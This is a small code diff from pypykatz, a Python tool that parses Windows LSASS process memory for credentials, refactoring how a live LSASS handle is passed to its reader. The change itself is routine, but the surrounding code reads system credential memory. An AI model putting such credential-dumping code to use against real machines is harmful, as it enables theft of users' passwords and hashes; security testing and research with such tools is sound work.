@@ -95,8 +95,7 @@ class pypykatz:
 		if platform.system() != 'Windows':
 			raise Exception('Live parsing will only work on Windows')
 		from pypykatz.commons.readers.local.live_reader import LiveReader
-		reader = LiveReader()
-		reader.lsass_process_handle = lsass_process_handle
+		reader = LiveReader(lsass_process_handle=lsass_process_handle)
 		sysinfo = KatzSystemInfo.from_live_reader(reader)
 		mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
 		mimi.start()
